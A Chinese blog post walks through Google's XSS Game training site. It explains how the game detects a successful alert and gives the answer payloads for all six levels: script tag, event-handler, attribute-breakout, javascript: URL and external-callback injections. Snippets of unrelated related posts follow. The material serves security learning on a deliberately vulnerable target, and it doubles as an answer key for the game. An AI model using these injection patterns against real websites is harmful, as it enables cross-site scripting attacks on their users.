有趣的游戏:Google XSS Game

Google最近出了一XSS游戏:

https://xss-game.appspot.com/

我这个菜鸟看提示,花了两三个小时才全过了。。

这个游戏的规则是仅仅要在攻击网页上弹出alert窗体就能够了。

题目页面是在iframe里嵌套的展现的。那么父窗体是怎样知道iframe里成功弹出了窗体?

是这样子实现的:

题目页面载入了这个js,改写了alert函数,当alert被调用时,向parent发送一个消息。

https://xss-game.appspot.com/static/game-frame.js

/* If we're being iframed, let the parent know our URL */
/* Kids: don't do this at home! */
parent.postMessage(window.location.toString(), "*");

/* Override window.alert */
var originalAlert = window.alert;
window.alert = function(s) {
  parent.postMessage("success", "*");
  setTimeout(function() {
    originalAlert("Congratulations, you executed an alert:\n\n"
      + s + "\n\nYou can now advance to the next level.");
  }, 50);
}

然后父窗体注冊了一个EventListener来接收这个消息:

https://xss-game.appspot.com/static/game.js

window.addEventListener("message", function(event) {

  if (!window.location.origin) {
    window.location.origin = window.location.protocol + "//"
        + window.location.hostname
        + (window.location.port ?

':' + window.location.port: '');
  }

  if (event.origin == window.location.origin && event.data == "success") {
    userOpenedAlert = true;
    levelSolved();
    return;
  }

最以下是题目的答案。假设想自己玩游戏的,慎拉下。

题目的答案:

Level1:

<script>alert(1)</script>

Level2:

<input onmouseover="alert(1)">

Level3:

https://xss-game.appspot.com/level3/frame#3.jpg‘ onload="alert(1)">

Level4:

3‘);alert(‘1

Level5:

https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)

Level6:

重点是前面要有一个空格。

? https://www.google.com/jsapi?

callback=alert

游戏过关之后,google给出了一个xss的文档:

https://www.google.com/about/appsecurity/learning/xss/index.html

版权声明:本文博客原创文章。博客,未经同意,不得转载。

时间: 2024-08-02 16:42:08

有趣的游戏:Google XSS Game的相关文章

110种有趣的游戏和应用

声明:这是一篇译文,查看原文请猛戳http://www.datamation.com/open-source/110-fun-open-source-games-and-apps-1.html. 又一次,我们庆祝夏天的到来,和夏天一同来到的还有一系列开源的高品质游戏.今年的最佳游戏列表在去年的基础上,增加了一些好玩的游戏,同时删除了一些不再处于活跃开发状态的游戏.在这个列表中,你会发现街机类游戏,棋盘类游戏,休闲类游戏,益智类游戏,教育类游戏,第一人称射击类游戏,音乐类游戏,跑酷类游戏,角色扮演

Nim Game,一个有趣的游戏,也是一道入门算法题。

Nim Game,其实很多人都玩过.其实就是我们玩的划线游戏. 一张纸上,画若干条线,双方一人划一次,每次划掉1~3条线.可以选择画1条,也可以划2条,也可以3条.具体划去几条线完全看自己的策略.谁划掉最后一条线,就是赢家. 如上图,蓝方获胜. 正在看这篇文章的你一定是一个聪明人,每一步都是最优解,而你的对手,也跟你一样聪明,每步都是最优的解法. 现在你作为先手,在线条总数为多少的时候,你必赢呢,又在多少的时候必输呢? 可不可以用一个函数来判断在线条总是为x时你的输赢情况呢?这样你以后跟别人玩这

java编程的一个猜数字有趣小游戏

import javax.swing.Icon; import javax.swing.JOptionPane; public class ai { /** * @param args */ public static void main(String[] args) { Icon icon = null; boolean bl = false; int put = 0; int c = (int) (((Math.random())*100)+1); //获取一个1-100的随机数 Syste

【BZOJ1444】[Jsoi2009]有趣的游戏 AC自动机+概率DP+矩阵乘法

[BZOJ1444][Jsoi2009]有趣的游戏 Description Input 注意 是0<=P Output Sample Input Sample Output HINT  30%的数据保证, n ≤ 2. 50%的数据保证, n ≤ 5. 100%的数据保证, n , l, m≤ 10. 题解:本题的做法真的很多啊,概率DP,期望DP,当然还有矩乘黑科技~ 就是先跑AC自动机,弄出转移矩阵,然后自乘50次就行了. #include <cstdio> #include <

Google XSS game writeup

用过Chrome的应该知道它的XSS Auditor,它可是灭掉了不少XSS代码呢……Google对XSS是很有研究的,不然也不敢大张旗鼓的悬赏(7500刀哦亲),还开发了一个XSS小游戏 http://xss-game.appspot.com/ (需FQ……),一共有6关,做完有“大蛋糕”奖励哦!下面就来看一下. Level 1: Hello, world of XSS 既然是“Hello world”级别的,想必就是简简单单弹个框在输入框里输入<script>alert(1)</sc

[BugBounty] Sleeping stored Google XSS Awakens a $5000 Bounty

来源:https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/ 理解 这篇文章主要是介绍了Google云端控制台上发现的存储型跨站点脚本(XSS)问题. Google提供60天 免费试用 ,预算为300美元,所需要的只是输入(正确)付款信息以证明您不是机器人. Google云:https://cloud.google.com/free/ 在项目,标题为 ">&l

Android用SurfaceView写一个简单有趣的游戏--《数字组合》之一

最近突然有了一个想法--做一款android的简单游戏练练手,既要实现起来简单(毕竟只有一个人,框架什么的暂且就不用考虑了),又要能够达到对android知识框架的复习和游戏要有可玩性,终于用了几个星期写完了.和大家分享分享体会吧. 本来打算写一个专栏的.看以后的时间吧. 首先介绍一下游戏的主要思想和SurfaceView也就是游戏主界面的代码分享,后续部分再更新吧. 在点击 开始游戏 后,进行组合数字的选择,根据难易程度系统默认选择2和8,选择界面中间显示选择的组合数字,第一个数字表示第一个组

[bzoj1444]有趣的游戏

将所有字符串建一个ac自动机,用f[i]表示随机字符串匹配到第i个字符的概率,可以转移到某些字符,如果这个点是末尾那么他只能转移到自己且概率为1,高斯消元即可(另外还有一个有趣的做法,因为精度要求不高,可以直接对这个矩阵自乘50次得到的就是结果) 1 #include<bits/stdc++.h> 2 using namespace std; 3 #define N 105 4 queue<int>q; 5 int V,n,l,m,x,y,end[N],vis[N],nex[N],

BZOJ1444 : [Jsoi2009]有趣的游戏

建立AC自动机,并求出转移矩阵. 再用$\sum E(终止节点)=1$去替换第一个方程,高斯消元即可. 时间复杂度$O(n^3l^3)$. 注意精度问题,要特判0.00的情况. #include<cstdio> #include<cmath> #include<algorithm> #define N 110 using namespace std; int n,l,S,i,j,k,tot,son[N][10],v[N],fail[N],q[N],fin[N]; cha